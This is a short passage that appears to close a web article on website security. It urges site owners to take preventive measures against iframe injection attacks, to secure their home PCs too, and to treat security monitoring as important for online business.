If you follow all the measures stated in this document, you will prevent your website from becoming a victim of iframe injection attacks. It is also important to note that your website may not be the only victim. Your home PC may also be a victim. You must also have preventative measures on your PC. Make sure you read the article "Website Protection Against iFrame Injections" as mentioned previously. This is a must.

Website security and monitoring is a vital part of the success of your online business. Making it a priority is crucial for your website file and data protection. Understanding that and taking the steps to properly implement website security practices can mean increased sales and more business opportunities.